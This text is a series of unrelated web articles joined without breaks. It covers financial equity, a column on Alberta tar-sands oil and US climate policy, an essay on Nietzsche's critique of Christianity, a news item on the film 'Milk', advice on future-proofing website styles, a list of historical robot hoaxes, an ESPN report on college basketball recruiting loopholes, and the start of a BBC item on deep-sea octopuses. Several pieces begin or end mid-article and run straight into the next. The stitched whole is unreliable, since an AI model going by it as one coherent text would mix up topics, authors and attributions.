Equity , then , is akin to a pillow - top mattress for a creaky back .
An equity cushion means strong financial health and a good night ’s sleep .
In bad times , equity is a means to self - preservation .
Your equity is your safety net and your window to real prosperity .
Equity on your balance sheet is your real wealth .
The Best of Karen De Coster
President - elect Barack Obama has inherited the in - box from hell , but you could practically smell the fear in some other quarters as he listed his top priorities in his victory speech in Chicago : " two wars , a planet in peril , the worst financial crisis in a century . "
There will be general rejoicing if he can end the wars and solve the financial crisis , but " a planet in peril " is shorthand for climate change , and some people 's oxen will be severely gored if he acts decisively on the global - warming agenda .
First off the mark with an attempt to limit the damage was Canada 's Prime Minister Stephen Harper .
The very day after the election , Harper proposed a joint U.S. - Canada pact on climate change whose real purpose is to protect Canada 's " dirty oil " .
That is the phrase Obama 's advisers have used to describe oil imported from northern Alberta 's huge tar sands region , which has a far higher cost in terms of the carbon dioxide emitted in its production than conventional oil .
How much higher ?
That 's practically a state secret , but unofficial estimates suggest that separating Alberta 's oil from the sand produces as much as three times more carbon dioxide than just pumping oil out of the ground in the old - fashioned way .
The United States is the main market for that oil , and American legislators have already begun to target it as an easy way of cutting emissions without hurting American voters .
Last year , the U.S. Congress passed a law banning federal government agencies from buying alternative fuels ( i.e. oil from tar sands , oil shales , or coal - to - oil projects ) that have greater greenhouse - gas emissions over their entire life cycle than conventional fuel .
California has passed regulations requiring fuel suppliers to reduce the emissions from the fuel they sell — and to account for those emissions right back to the original production source .
So far , not so bad .
After all , the US government buys only two percent of the oil consumed in the United States , and California has only one - sixth of America 's vehicles .
But this could be just the entering wedge .
A national ban on the importation of unconventional oil would be an attractive and politically cheap move for Obama , who needs to demonstrate his commitment to cut U.S. greenhouse - gas emissions but will be seriously short of money for big domestic projects until the recession ends .
Tar -sands producers in Alberta are scared , and Prime Minister Harper is from Alberta .
Harper 's strategy is transparent .
He wants a climate change pact with the United States in which Alberta 's " dirty oil " is exempted from controls on the grounds that it contributes to that other American national goal , " energy independence " .
( The subtext here is that Canada is not really foreign , though of course he can not put it quite that bluntly . )
In return , he would negotiate a common cap - and - trade system in which American and Canadian users of fossil fuels would have to pay for their emissions .
Obama 's response to this offer will depend on where he is on the learning curve about climate - change strategies .
Does he realize that Alberta 's oil is America 's for as long as the United States wants it , deal or no deal ?
More importantly , has he been seduced by the strategic myth about " energy independence " ?
Since the Arab oil embargo at the end of the 1973 war in the Middle East , " energy independence " has been a mantra in U.S. domestic politics , although little progress has been made in reducing American dependence on imported oil .
Insofar as this quest drives the United States to reduce energy consumption and to seek non-fossil fuel sources of energy , it serves the cause of cutting greenhouse - gas emissions — but it also reflects a mindset that has led to a lot of really bad strategic decisions .
It is not 1973 .
Back then , the Arab oil exporters had relatively small populations with low economic expectations , and could easily forego their oil income for a few months .
Since then , populations have grown dramatically ( threefold in Saudi Arabia ) and their economic expectations have risen even faster .
Today , there is NO major oil producer that could afford a lengthy interruption in the cash flow from its exports .
That means that the United States has no need either to kowtow to the oil - exporting countries or to control them militarily .
It can buy all the oil it wants if it 's willing to pay the going price on the world market — and all of its oil - related military adventures over the years have never resulted in a lowering of that price .
( Why would American oil companies want a lower price ? )
Energy independence , properly understood , is about ending dependence on imported fossil fuels because they involve shipping huge amounts of money abroad , not because the supplies of fossil fuels are actually liable to be cut off .
To the extent that the goal of energy independence encourages the growth of alternative energy sources within the United States , it is a useful element in a strategy for reducing greenhouse - gas emissions — but not if it is used as a pretext to replace imported oil from allegedly unreliable sources with dirtier oil from a friendlier source .
Harper is appealing to the stupid version of the energy - independence policy : maybe the Ay - rabs wo n't sell you their oil , but the Canadians always will .
It will be instructive to see if Obama falls for it .
Gwynne Dyer 's new book , " Climate Wars " , has just been published in Canada by Random House .
Nietzsche ’s most sustained account of the west ’s great death - traditions is in one of his last works , aptly titled The Anti-Christ .
The work offers a relatively detailed Nietzschean account of Jesus ’s own psychology , and how his teachings were transformed into a means for suppressing life ’s instincts .
We can provide a brief sketch of the account .
Jesus , according to Nietzsche , was timid and over - sensitive by temperament .
He found conflict and confrontation deeply disturbing and frightening .
So he developed a “ turn the other cheek ” response to his enemies , yielding anything to everyone , promising that on a day coming soon none of these tribulations would matter and everything would be replaced by a kingdom of heaven .
More than that : Jesus found ways to insulate himself from all the pains and horrors of the world , and turn each and every moment into a little miracle , a feeling for the closeness of heaven , which is the permanent refuge from real life .
Jesus found a way to keep the arms of the Father around him at all times , protecting him and sustaining him , so that his joy could not be removed by any earthly power .
It was , in Nietzsche ’s phrase , “ an infantilism that has receded into the spiritual ” ( A , 32 ) .
Of course , Jesus was killed , but his followers did not share his temperament .
( “ There was only one Christian , and he died on the cross , ” Nietzsche writes memorably ( A , 39 ) . )
They instead , like most human beings , sought after earthly power .
But they ran immediately into a problem : Jesus eschewed any pursuit of power , and counseled disengagement with the political world .
What to do ?
In a cognitive flip of values that continually astonishes Nietzsche , the followers of Jesus decided that the way of Jesus was in fact the route to true power , the road to “ living abundantly . ”
Contradictory though it may seem , the life of earthly servitude is in fact the life that God will richly reward .
The virtuous life is the one that devalues pursuits of earthly pleasures , wealth , power , and prominence .
The “ good ” person is the one who subordinates all drives to a single drive : the drive to serve the Church and its head , Jesus Christ .
Through this servitude , the follower will raise himself higher than earthly powers and principalities , and reap rich rewards in heaven .
The servant will be the master .
What feels good is really bad .
What feels powerful is really weakness .
What feels wise is really folly .
To live for Christ is to be dead to the world .
Indeed , the very symbol for eternal life is a man dying on a cross .
It is as perverse as a system of values can possibly be , Nietzsche thought .
This Christian reversal of life ’s values did increase the earthly power of a certain class of people — the priests , who were so kind as to take the dangerous temptation of power upon themselves in the interest of instilling true piety among the members of the church .
So even in this twisted reversal of life ’s values , the will to power continues to flourish , in a somewhat underhanded way .
There are individuals who continue to seek and gain power through the church , that is , by promulgating and enforcing the set of values which themselves denigrate the will to power .
It is a familiar form of hypocrisy between the message and the motives of those delivering the message .
Someone gets rich by selling books which tell people not to be materialistic .
Someone manages to attract attention to themselves by appearing not to care if others notice .
Someone tries to cause a revolution in his culture by writing books which loudly proclaim their own “ untimeliness . ”
And so on .
Life will always find a way to pursue its own agenda , even through a set of values which themselves explicitly devalue life ’s values .
The church was lead by men who were , by life ’s standards , quite strong indeed .
“ The values of the weak have the upper hand because the strong have taken them over to lead with them … ”
Nietzsche writes in a note ( LN , 15 [ 79 ] ) .
But if this is so , one may object , then what is the problem ?
Are n’t life ’s values being promoted , though in an indirect or even subterranean way ?
If power and flourishing are the highest values , according to Nietzsche , how can he criticize the advance of Christianity , which in a certain way has enjoyed unparalleled success in gaining power and flourishing throughout western culture ?
Is n’t it a force Nietzsche should respect and admire ?
To some extent he does ; just the fact that Nietzsche has selected Christianity as his most important opponent says something about how impressed he is by its power .
But at the same time he sees Christianity as the least effective means for promoting the flourishing of life ’s values .
“ Christianity , ” he writes , “ has cheated us out of the harvest of ancient culture ” ( A , 60 ) .
He is grateful to the men of the Renaissance for attempting to rescue the glorious expressions of power in ancient culture from the suppression of death - worshipping Christian zealots .
But Luther and the Reformers rallied to the cause and found new means for strengthening the church ’s hold over European culture and , in effect , killed the Renaissance .
In doing so , they put a stranglehold on life ; Christian morals became if anything even more severe , and the normal and natural ways of expressing life ’s flourishing were judged as thoroughly sinful .
Nietzsche ’s worry was not that Christianity will somehow exterminate the will to power .
That could never happen .
His worry instead was that the joy and strength that comes from a healthy flourishing of human drives becomes nearly impossible to enjoy , when Christianity has its way .
The cost is aesthetic , intellectual , philosophical , political , and even moral , in a Nietzschean sense .
Christianity is by its very nature a sickness , a striving against the instinct of life .
It is as if the organizers of a marathon convinced all the runners that speed is evil .
You could still have a race — sort of — but what a pathetic bore it would be !
Runners would shuffle along , keeping an eye on one another , and chiding those who start to get ahead .
The “ winner ” would be the one who failed to go slower than anyone else .
At some point , an exasperated bystander might cry , “ Enough of this !
You are built to run !
There is no sin in that !
What on earth is holding you back ? ”
That person is Nietzsche .
Share this : Facebook
More
Tumblr
Twitter
Email
Related
LOS ANGELES 
When the movie “ Milk ” comes next month to Claremont , a college town about 30 miles from here , Patrick Milliner intends to greet it with a candlelight vigil protesting the newly passed state prohibition of gay marriage .
Before this month ’s election , Mr. Milliner organized unsuccessful opposition to California ’s same - sex marriage ban , Proposition 8 .
Now he expects the movie , about Harvey Milk , the murdered gay - rights crusader and San Francisco supervisor , to ignite his “ Shame on 8 ” campaign .
“ It fits perfectly with the plan , ” Mr. Milliner said .
That may be good for the movement .
Whether it is also good for the movie is less clear .
The convergence of “ Milk , ” which portrays gay - rights battles of 30 years ago , and a looming new culture war over homosexual marriage and other issues , has raised unusual expectations around Focus Features ’ plan to release the film .
It will be shown in a widening group of theaters , beginning with some in New York , Los Angeles and about a dozen other cities on Wednesday .
A web site is like a building .
Over time it gets lived in .
And , regardless of the initial intentions of the designer for how everything within it should be arranged , things get moved around , stuff gets added , some things get taken away , more stuff gets added , the occasional renovation takes place , and yet more stuff gets added .
Many web sites are not really designed to be ‘ lived in ’ — i.e. to support all these changes by different owners with various intentions .
After a while they bear little resemblance to any sort of coherent design and are likely to become increasingly hard to manage .
Of course , it ’s impossible to plan for all the ‘ home improvements ’ that will happen to a web site between major redesigns .
However , it is possible to be prepared so that the addition of something new to a page does n’t break its design .
A good way to future - proof a web site is to create styles in advance for the most common page elements , even if they are not yet being used .
This is called ‘ planning ahead ’ 😉 and is an activity often overlooked by web designers .
Using the ‘ planning ahead ’ method , if a content author wants to add something to a page — say , a definition list — you ’ve already planned how it will look so that it fits within the overall page design and will coexist with the other elements that may be present .
Let ’s take a look at the more common page elements a future - proofed site should plan for .
Headings
Even though you may only be using H1s and H2s , it ’s worth creating styles for H1 down to H4 .
I ’d question whether you need to go further than that ( perhaps just make H4 , H5 and H6 look the same ) .
If a content author feels the need to use heading levels all the way down to H5 or H6 the structure of their content may be in question .
You might also want to create a style for a byline or a page summary as it ’s not uncommon for these to be used below the main page heading .
Lists
Lists can be quite tricky from a layout perspective , especially when you take cross - browser display issues into account .
Therefore , it ’s essential to plan for different implementations of lists in advance .
Of course , you ’ll create styles for the standard ordered and unordered list .
But , what about nested lists ?
I would at least plan for the following variations :
Unordered list with a nested unordered list
Unordered list with a nested ordered list
Ordered list with a nested ordered list
Ordered list with a nested unordered list
I would n’t worry about more than one level of nesting .
If the content requires this , from a web readability standpoint it should more than likely be rewritten .
Definition lists are a great way to display lists of resources .
You ’ll often have a link to a resource ( such as a PDF ) and a summary sentence below it .
Take the time to set this style up and you ’ll stop users from littering your ‘ resources ’ pages with < br /> tags .
Web pages often start with a list of jump links to the various sections on the page .
It ’s worth considering a style for this type of link list , to visually separate it from the regular content on the page .
A list of links with thumbnails plus a summary is quite a popular approach for gallery pages , so you may want to create such a style in advance .
Tables
Tables can be very time - consuming to build and style .
However , with a little forethought at least the styling part can be made easier .
Be sure to plan for types of data other than numerical that tables can contain — such as text and images .
Here are the common table elements that you should consider :
Table headings along the top row
Table headings along the top row and left column
Table cell containing text ( multiple paragraphs ) / list / image
Caption
Footnotes
It ’s also worth adding in advance any table - related functionality ( often JavaScript - based ) that you will likely be using .
This can include :
Displaying table row backgrounds in alternating colors
Highlighting the row and / or column being moused over
Sorting a table by a column
If you ’re managing a corporate web site it ’s a good idea to also think about financial data such as that in an annual report might be displayed .
Images
There are n’t too many variations on how images are placed within content , so they ’re pretty easy to plan for .
Try incorporating options for the following :
Image floated to the left or right
Image with a caption
Image with a caption that contains a link
Image that is a link
Image that displays a larger version on being clicked
Multi-image slideshow
Image with a photography credit
Links
As well as the standard link states , consider whether links to external sites and to downloadable files should be treated differently ( i.e. indicating the target of the link ) .
It may also be worth planning for how to style an A to Z index .
Forms
It ’s impossible to plan for all the layout complexities that forms can require .
However , do plan for all the standard form elements — for example , that are present in a registration form — as well as how error messages will be presented .
JavaScript
I ’m no JavaScript expert , but I do know that it ’s often a good idea to choose a JavaScript library upfront rather than cherry pick individual scripts and hope they all work well together .
Doing this will help you to avoid functionality clashes and bloat that can come from using scripts from a variety of sources .
I ’ve used jQuery in the past , which is well established and has a good selection of plugins .
Pull Quotes
Pull quotes are a great way to call out important information or lines from quotations .
I ’d highly recommend creating styles for these common pull quote variants :
Floated to the left and right
Within a paragraph and at the start of a paragraph
Without a citation
With a citation
Other Things to Consider
If you ’re not already using Flash , plan for how you will embed it into your site .
Also , consider creating styles for displaying sidebar content such as boxes of related links or featured resources .
Do n’t forget to create a print style sheet and maybe even a mobile style sheet ( and remember to keep them updated ) .
How Does Everything Fit Together ?
Lastly , it ’s important to test the interaction of different combinations of page elements .
It ’s simple enough to separate headings and paragraphs appropriately .
But what about a heading followed by a table ?
Or , a heading preceded by a list ?
Or an H2 followed by an H3 ?
The same is true for other page elements — for example , lists followed by tables .
It ’s worth taking the time to try out these different page layouts ( including the more unlikely ones ) to make sure that your spacing is set up correctly .
It ’s much easier to do this in advance than to incrementally tweak your CSS as content gets moved around and added .
In 1912 , inventor Lee De Forest was arrested and charged with mail fraud for promoting an early vacuum tube using “ absurd and deliberately misleading statements . ”
“ De Forest has said in many newspapers and over his own signature that it would be possible to transmit the human voice across the Atlantic before many years , ” the district attorney charged .
“ Based on these absurd and deliberate misleading statements , the misguided public … has been persuaded to purchase stock in his company . ”
Two years later , De Forest transmitted his voice from Arlington , Va. , to the Eiffel Tower .
From our earliest dreams of golems and Galatea , people have wanted to create artificial beings with human characteristics and abilities .
But in our haste to see a future of walking , talking mechanical humanoids , we 're easily fooled by con artists looking to exploit our sense of wonder .
Hoaxers and engineers , magicians and advertising agencies have sold the public on " robots " whose incredible abilities seemed to defy explanation .
We pull the curtain back on some the fake automata that captured the human imagination .
Advertisement
Psycho : Automata were all the rage in the US and Europe in the late 19th Century .
Most were merely intricate mechanical dolls and toys that performed pre-set actions , but a handful appeared capable of interacting with their environment .
One of the most famous of these was Psycho , the creation of John Nevil Maskelyne .
Maskelyne was an inventor and stage magician , a member of The Magic Circle , which worked to dispel the notion of supernatural powers , and innovator of the levitation illusion .
Psycho , a doll dressed as an Eastern sorcerer , would pick up playing cards from a rack in order to spell words , do mathematical problems , and perform tricks , all the while smoking a cigarette .
Although Psycho appeared to move of his own accord , he was actually a puppet , operated by a series of bellows .
Those bellows were eventually dismantled and Psycho was donated to the Museum of London .
Joice Heth : PT Banum launched his famed career as a hoaxer with Joice Heth .
In 1835 , Barnum purchased Heth , a blind and paralyzed slave , and toured her around the country as George Washington 's own wet nurse , claiming that she was over 160 years old .
When Heth 's appeal began to fade , Barnum reinvented his attraction .
When he began claiming that Heth was not merely an aged woman , but an automaton made from whale bone , India rubber , and an ingenious network of springs , people again flocked to the exhibit , trying to determine whether or not she was a real person .
Upon her death , Barnum had Heth publicly autopsied .
Not only was she a human being , she was no more than 80 years old .
Advertisement
Enigmarelle : Another product of the automaton craze , Enigmarelle was a life - sized creature with a lumbering gait and a wax face .
The alleged automaton could reportedly ride a bike , write its name , and know to turn corners as it walked , although it could neither hear nor speak .
Its " inventor " Frederick Ireland claimed that Enigmarelle 's incredible walking and riding abilities stemmed from an equilibrium system based on the human inner ear .
As " proof " of the machine 's authenticity , the hands and legs were removed during shows and its body and head opened to reveal electrical workings .
It has been suggested that Enigmarelle was , in fact , manned by an amputee to create that very effect .
Still , the less - than - automatic automaton enjoyed a 30 year career in vaudeville .
G/O Media may get a commission LG 75 - Inch 8K TV Buy for $ 2150 from BuyDig Use the promo code ASL250
Quasar Domestic Android : Hoping to capitalize on the popularity of science fiction movies , Quasar Industries announced in 1978 that it would soon be mass - producing domestic household robots .
Quasars would be able to dust , vacuum ( not anticipating the Roomba , Quasars would use a separate vacuum cleaner ) , mow the lawn , walk the dog , and teach children French .
At a demonstration , the domestic android was strangely animated , intelligent , and conversant in a number of topics .
Skeptical roboticists who attended the demonstration quickly discovered a man in the audience who muttered into his hand each time the robot spoke , and the project was eventually outed as a press - seeking hoax .
Lisa the Perfect Woman :
This summer , the blandly named AI Robotics announced that they have completed a fully functioning robotic woman .
" Lisa " ( possibly named for the AI creation in " Weird Science " ) is supposedly " designed for all men who have not found their soulmate " — a soulmate who cooks , cleans , plays video games , and provides sex on demand without being weighed down by pesky emotions or desires .
As if the uber - creepy promo video were n't enough to convince you of the product 's nonexistence , these robots were supposed to go on sale this past June .
It 's still unclear , however , what purpose , if any , the hoax had .
Mini Cooper Autonomous Robot : A website allegedly set up by a UK researcher claimed that the researcher had built an autonomous , Transformers - like bipedal robot from a Mini Cooper .
The robot was supposed to be over 10 feet tall , powered by an internal combustion engine , and running on Linux .
The site garnered a great deal of attention from sites like Slashdot , but was ultimately discovered to be a viral marketing campaign launched by BMW .
Advertisement
Boilerplate : Boilerplate was a mechanical man unveiled at the 1893 World 's Columbian Exposition .
He was fought alongside Teddy Roosevelt , saved an expedition to Anarctica , and saved Pancho Villa 's life .
Boilerplate mysteriously vanished in WWI , which would be a tragedy had he ever actually existed in the first place .
The Boilerplate website , which features specs for other Victorian robots , was an inadvertent hoax perpetrated by Anina Bennett and Paul Guinan as a pitch for a graphic novel .
But several visitors to the site believed that Boilerplate was a genuine , little - known historical figure , including comedian Chris Elliot , who committed an act of accidental plagiarism when he made the robot a character in his humorous historical novel .
Advertisement
The Digesting Duck : Artist and inventor Jacques de Vaucanson was inspired by Descartes ' principle of the mechanistic universe to create a mechanical animal .
The Canard Digerateur was said to have the ability to eat grain , digest it naturally , and defecate waste .
The duck became a popular and oft - exhibited automaton , but did n't actually digest anything .
The grain it ate was collected in a container inside the duck , while the " feces " were contained in a separate part .
Physiologists were reportedly disappointed when the hoax was uncovered , as they had hoped to learn whether the process of digestion was chemical or mechanical .
Even failing to digest anything , the duck was an impressive piece of machinery , otherwise faithfully based on the physiology and articulations of a natural duck , and was one of the first automata to use rubber hose .
Advertisement
The Mechanical Turk : Arguably the most notorious mechanical hoax , the Turk had a marked impact on contemporary notions of machines and even modern AI .
Wolfgang von Kempelen , a pioneer in phonetics , created an " automated " chess player to exhibit at the court of Austria 's Empress Maria Theresa .
Like later automata , the Turk included a doll in Eastern dress .
The doll stood over a clockwork cabinet and played chess against human opponents , including Napoleon Bonaparte and Benjamin Franklin .
The Turk toured Europe and later America , and became a popular attraction that confounded engineers and chess players alike .
The hoax was exposed 50 years after Kempelen 's death and three years after the Turk itself was destroyed : a chess player was cleverly disguised inside the cabinet .
The Turk spawned numerous imitators , most famously Ajeeb and Mephisto .
It is thought to have inspired the likes of Charles Babbage and Edmund Cartwright , and sparked a great deal of discussion about artificial intelligence .
Nearly 20 years ago , Eddie Sutton resigned as Kentucky coach after a package sent from assistant Dwane Casey to the father of recruit Chris Mills opened in transit , spilling $ 1,000 for all to see .
Pardon some coaches if they wax nostalgic for the days gone by , when rule breaking was clear - cut and obvious .
Saint Joseph's coach Phil Martelli is outspoken in his desire to clean up some of the recruiting loopholes .
Howard Smith / US PRESSWIRE
Like the evolution from Chuck Taylors to Air Jordans , the art of cheating has been refined and streamlined .
Sure , rules still are being flat - out broken the old - fashioned way , but the new wave sweeping the game is rule circumvention , not rule breaking .
Clever coaches are employing a strong grip on semantics to expose loopholes and reinterpret rules to their benefit .
It 's not so much cheating as it's , well
" You mean shady ? " Texas Tech coach Pat Knight supplied .
Here 's some ways cheating is made in the shade these days :
Carefully choreographed elite camps ; travel team coaches suddenly ending up on college benches with their super - stud players conveniently going along for the ride ; speaking fees for those same coaches at colleges that just happen to be recruiting their players .
It 's all ethically questionable yet mostly on the up - and - up .
Why break a rule and buy a kid a hamburger when you can obey a rule and buy his coach ?
" People are always going to work the gray areas , " Georgetown coach John Thompson III said .
" Most people if they 've had any success in life have learned how to work the gray areas . "
Guided by the security that no foul equates to no harm , coaches are pretzel - bending the NCAA bylaws , using a wink and Cheshire cat grin to trample and shred the original intent of the rulebook .
" Instead of having a really good skill instructor on your staff , you 're better off with a lawyer who can parse the rulebook , " Saint Joseph 's coach Phil Martelli said .
" You need someone who can say , ' I got it .
Eureka !
I got the loophole . ' "
But the perfectly legal yet ethically questionable choices are causing a growing divide among college basketball people .
On one side are those who argue that they 're being attacked yet technically have n't done anything wrong .
This is n't about clandestine meetings or dark alley exchanges .
Everything people are railing about is done in broad daylight because everything is within the framework of the rules .
" I do n't even know why we 're talking about this , " said Larry Orton , the father of top recruit Daniel Orton , who has been sucked into the maelstrom thanks to his son's recruitment at Kentucky .
" It 's all legal .
It 's perfectly legal . "
But on the other side is a growing number of coaches -- Martelli among them -- who see things a little differently .
They do n't see clever coaches so much as they see master manipulators , people who carelessly blur the ethical lines of the game without an interest in anything more than self - preservation .
They also see coaches who play by the rules fired for lack of production and coaches who report other coaches ostracized .
Worse , they see the very notion of college athletics taking a bath , sucked under by gamesmanship instead of sportsmanship .
" An awful lot of people have benefited or risen in the coaching ranks with huge raises as a result of being clever , " Cal coach Mike Montgomery said .
" And then there are the other guys , the ones sitting out there saying , ' I 've followed all these rules and done it with the actual intent of the rule and I 'm making a buck ninety - five . '
Where 's the incentive to do right ? "
Wednesday marked the end of the early signing period .
It should be a day to celebrate the future of the game as college kids inked their names to their futures .
Instead , most people exit November asking one question :
What did that coach do to get that kid ?
" There 's an awful lot of money moving underground to get kids where they need to get to develop relationships , " Montgomery said .
" I just sit here and wonder , how are all these kids making unofficial visits 3,000 miles from home ?
How are they getting to these elite camps ?
Somebody is paying for it and that is very troubling to me . "
Kentucky 's Billy Gillispie has found creative ways to work within the NCAA regulations .
Andy Lyons / Getty Images
The distrust and skepticism among coaches is almost palpable .
This is a fraternity of men who spend as much time looking over their shoulders as they do breaking down game tape .
The paranoia is not at all unfounded .
One AAU coach said that when it comes to recruiting the top echelon of players , " you can bet somebody is getting something . "
But when the something someone is getting is entirely permissible , what do you do ?
Kentucky coach Billy Gillispie , who impishly tweaks the NCAA at every turn , came under fire not once , not twice but three times in the past six months .
First he lured a verbal commitment from an eighth grader , prompting the National Association of Basketball Coaches to recommend coaches refrain from making scholarship offers until after a recruit 's sophomore year of high school .
Then he moved Midnight Madness up one week , prompting emergency legislation from the NCAA Board of Directors to cement the Midnight Madness date .
And the day after that early madness he got a commitment from Daniel Orton , a top - 10 player .
Orton played for his father , Larry , on the Athletes First travel team .
According to the Louisville Courier - Journal , Larry Orton pocketed $ 4,800 from Kentucky for 16 speaking engagements at Wildcats summer camps .
Terrence Crawford , Daniel 's stepbrother , was paid $ 1,950 for nine talks he gave to Kentucky campers .
It was all perfectly legal since coaches are allowed to be paid for speaking engagements , even if they also happen to be related to a recruit .
Daniel Orton , by the way , attended two of Kentucky 's camps .
Critics argue it 's little more than well - couched payola done under the artifice of the rules .
By hiring Larry Orton , Kentucky basically funded Daniel 's camp appearances , allowing the Wildcats to bring a top recruit on campus before he was allowed an official visit .
" It should n't be allowed , " Michigan State coach Tom Izzo said , " but it is . "
Even Gillispie understands the criticism .
" I think the rule -- I 've been in favor of the rule being changed for a long time , " Gillispie said about being allowed to pay coaches to speak at his camps .
" I think that 's best for everyone . "
But the rule has n't been changed , and consequently , there is nothing more than the perception of a dirty deal .
Larry Orton insists that Kentucky did nothing to sway his son's decision .
He also was paid to speak at camps at Oklahoma State and Kansas ( attempts by ESPN.com to access records were denied since the camps are run privately and not funded by the universities ) and Daniel attended elite camps at Oklahoma , Oklahoma State , Baylor and Connecticut .
" Do n't talk to me about how it looks , talk to me about the facts , " Larry Orton said .
" Did someone break a rule ?
The answer is no . "
Glance down a college bench sometime .
Count the number of people in uniform .
And then count the number of men in suits .
You 'll find less sartorial splendor on Wall Street .
Administrative assistants , video coordinators , director of recruiting , assistant director of recruiting -- you need a job on a college staff , it can be created , titled and filled .
And the job requirements are the same as they are worldwide :
It 's all about who you know .
When Doug Overton left the Saint Joe 's bench for the NBA this year , Martelli found himself in the market for an assistant coach .
" I had four or five guys call me and say , ' Hey if you hire me , I can deliver this guy , ' " Martelli said .
" It made my skin crawl . "
Coaches like to argue the chicken or the egg question -- which came first , the recruit or his parent / handler / strength coach / travel team coach / Svengali ? -- but there 's no doubt so - called package deals smell like rotten eggs .
Michael Beasley was supposed to go to Charlotte , and in fact , had given Bobby Lutz a verbal commitment .
But when Beasley 's former DC Assault coach , Dalonte Hill , left Lutz 's bench for a similar assistant 's job at Kansas State , Beasley went with him .
Beasley went on to become the player of the year and Hill the associate head coach at K - State , to the tune of $ 400,000 a year .
Instead of having a really good skill instructor on your staff , you 're better off with a lawyer who can parse the rulebook .
You need someone who can say , ' I got it .
Eureka !
I got the loophole . '
-- Saint Joseph 's coach Phil Martelli
Now the nation 's capital to Little Apple train is chugging along smoothly .
Three other former DC Assault players ( Jamar Samuels , Dominique Sutton and Ron Anderson ) are on the current roster .
Two more ( Wally Judge and Rodney McGruder ) signed letters of intent last week and will join the Wildcats next season .
And DC Assault point guard Daryl Trayhnam , a member of the Class of 2010 , has K - State on his short list .
Chris Walker has established a similar pipeline at New Mexico .
Since the former T - Mac All - Stars coach joined Steve Alford , the Lobos have brought four T - Mac players to town ( Will Brown , A.J. Hardeman , Phillip McDonald and Curtis Dennis ) and will welcome another ( Jamal Fenton ) next season .
After Mario Chalmers sank his dramatic game - tying 3 - pointer in the national championship game , he got to celebrate with his dad , Ronnie , who was the director of basketball operations on Bill Self 's staff .
Since that game , Mario Chalmers has left for the NBA and his father has resigned from his position .
At Arizona State , James Harden has said reconnecting with his high school coach , Scott Pera ( who arrived in 2006 , two years before Harden ) , was part of his attraction to the Sun Devils .
At Memphis , Tyreke Evans is sharing bench space with his personal strength and conditioning coach , Lamont Peterson , an administrative assistant to John Calipari ; and next season top recruit Xavier Henry will join brother C.J.
Henry there .
Once committed to Kansas , C.J. originally signed a professional baseball contract with the Yankees , but in what the local newspaper , The Commercial Appeal , termed a " surprising recruiting turn , " he joined the Tigers in August as a walk - on .
He also had considered Kansas , the runner - up to Xavier 's choice and alma mater of the boys ' father , Carl .
John
Wall , considered one of the top recruits in this senior class , has deferred his decision until spring .
One of the schools on his short list is Baylor , which this year hired his D - One Sports coach , Dwon Clifton .
" It 's sort of like Wall Street and the traders , " Louisville coach Rick Pitino said .
" If something just does n't seem right , it probably is n't .
But what can you do ? "
Absolutely nothing .
The NCAA can no more mandate who a coach hires as his assistant than it can dictate who a university names as its head coach , and you 'll have better luck proving the existence of Sasquatch than you will a tacit package deal .
Assistant coaches come out of the high school ranks all the time , so who 's to say which hire is dirty and which is n't ?
Besides , in today 's game , even the most honest coach would reluctantly agree that these convenient pairings can make good business sense .
Basketball is n't complicated .
The team with the best players generally wins and the team that wins generally keeps its coach employed .
An assistant who can work the recruiting trail , or better yet , come armed with already established relationships , is more valuable today than a guy who can coach a big man solid footwork .
Illinois went to the NCAA tournament in both 2006 and 2007 , and while its quick ( second - and first - round , respectively ) exits were tough to swallow , Bruce Weber did n't find his fanny placed firmly on the hot seat until last season , when Eric Gordon turned tail for Indiana .
" If I had an opening and there was a successful AAU coach , I would n't not look at him because he's an AAU coach , " Jim Boeheim said .
" I have a lot of coaches who are good recruiters .
The fact that they know someone is n't going to be a deal - breaker for me .
If you 're asking me would I hire a coach just to get a certain player ?
No .
I would n't do that .
Does that happen ?
Sure . "
Here 's the one thing everyone can agree on : No one wants more NCAA rules .
The reason the NCAA rulebook has swelled to its current 439 - page girth is because of chronic rewrites and amendments necessitated by clever rule interpretation .
There was a time when the rules only mandated how many and how often a coach could call a recruit .
And then along came text messaging .
Lo and behold , a new rule was born .
Many members of the NABC believe it 's time for coaches to stop looking to the NCAA to fix what ails them and instead look in the mirror .
Martelli points to the NABC 's strong voice against early commitments and its quick action to help quell further early midnight madness sessions as evidence that a strong , proactive group using a little peer pressure and common sense can get things done .
Cal 's Mike Montgomery is troubled by the underground financial network that is fueling the recruiting game .
AP Photo / Ben Margot
Their argument is n't just that the actions of some are hurting the perception of the game , but that by chewing on the outside edges of the rules , coaches are only hurting themselves .
The NABC has been begging university presidents to allow coaches more access with their teams , particularly in the summer months , when players work out on their own .
They fear that presidents will see coaches who manipulate an inch into 45 miles and will be loath to grant them any more leniency .
" There 's no doubt that presidents are paying attention to us and they want us to be more accountable , " said Notre Dame coach Mike Brey .
" The NABC has to grow some more teeth . "
Martelli said the organization quietly has done just that .
This summer , he said , coaches made private phone calls to colleagues , quietly urging them to stop sending assistant coaches to elite camps for middle schoolers .
He believes that sort of private muscle versus public embarrassment is the key to changing the culture of the game .
" We do n't want people to be defensive -- why are you coming after me ? " he said .
" But I honestly believe there is a groundswell of people who are willing to pick up the phone and say , ' Yes it 's legal , but do you really think it 's OK ? '
Is that naïve ?
Maybe I 'll say I 'd rather be naïve in this case . "
But cynics argue that asking college coaches to self - police is like asking politicians to play fair .
" What 's dirtier : college basketball or politics ? "
Pat Knight said .
" Let 's put it this way .
None of us are going to run for office . "
There 's simply too much at stake -- not just lots of zeros on a paycheck , but jobs in general .
Coaches are guided by a no - snitch mentality as strict as any you 'll find anywhere , terrified that the same group that preaches collegiality will shun a rat in an instant ( ask Bruce Pearl ) .
So they put on the blinders when dirty deals go down and throw up their hands when ethical quandaries erupt .
When someone is outed as a cheater or rule bender , they publicly gasp in indignation and privately snicker -- " It 's laughable , " Montgomery said .
" Oooh , wow , look at that guy .
Well , he did n't invent it . "
And while many legitimately fret that the image of their game is being sullied by the questionable decisions of the few , they grudgingly accept the fact that two things never change :
Rules are meant to be broken .
And everything is subject to interpretation .
Dana O'Neil covers college basketball for ESPN.com and can be reached at espnoneil@live.com .
( ESPN.com senior writer Pat Forde contributed to this story . )
By Mark Kinver
Science and environment reporter , BBC News
Megaleledone setebos , the common ancestor 's closest living relative
Enlarge Image
Many of the world 's deep - sea octopuses evolved from a common ancestor , whose closest relative still exists in the Southern Ocean , a study has shown .
Researchers suggest that the creatures evolved after being driven to other ocean basins 30 million years ago by nutrient - rich and salty currents .
The findings form part of a decade - long global research programme to learn more about life in the world 's oceans .
The first Census of Marine Life ( CoML ) is set to be completed in late 2010 .
